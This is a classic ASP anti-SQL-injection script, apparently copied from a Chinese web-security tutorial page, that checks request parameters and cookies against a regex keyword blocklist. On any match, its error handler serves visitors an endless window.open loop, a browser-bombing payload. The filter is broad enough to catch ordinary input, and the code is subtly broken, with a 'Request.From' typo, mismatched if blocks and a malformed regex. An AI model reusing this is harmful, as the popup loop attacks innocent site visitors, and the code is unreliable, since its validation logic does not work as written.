<% Rem Copy Right by Samy http://HdhCmsTest2cto测试数据 Call SafeRequest Sub SafeRequest if Request.QueryString<>"" Then Kll_inje(Request.QueryString) if Request.Form<>"" Then Kll_inje(Request.From) if Request.Cookies<>"" Then Kll_inje(Request.Cookies) End if End if End if End Sub Function Kll_Inje(Values) rem check sql injection Dim x,Kyd,In_Data Kyd ="(\sand\s|\sunion\s|\sor\s\b|\binsert\b|\bdelete\b|\sunion\s|\bupdate|\bdrop|\bdeclare\b\bcreate\b|\b\'|\;|\*|\@|\(|\)|\<|\>|\!|\-|\.\/|\_|\.\\)" For Each In_Data in Values Set X= New Regexp With X .IgnoreCase = True .Global = True .Pattern = Kyd If .Test(Values(In_Data)) Then Call Error End If End with Set X = Nothing Next End Function Function Kl_int(val) Rem check Integer if Not isnumeric(val) Then Kl_int=0 Call Error else if val<0 or val>2147483647 Then Kl_int =0 else Kl_int=clng(val) End if End if End function Function kl_Str(val) Rem Check String if len(val)<0 Then kl_Str="" else if instr(val,"'") Then kl_Str=trim(Replace(val,"'","")) Call Error End if End if End function Sub Error Response.Write "<script>while(1){window.open('http://HdhCmsTestfbi.gov');}</script>" 'Response.Redirect "/" Response.End End Sub %> 作者:Samy 出处:http://hi.baidu测试数据/0x7362/blog
查看更多关于有点暴力的sql防注入脚本 - 网站安全 - 自学php的详细内容...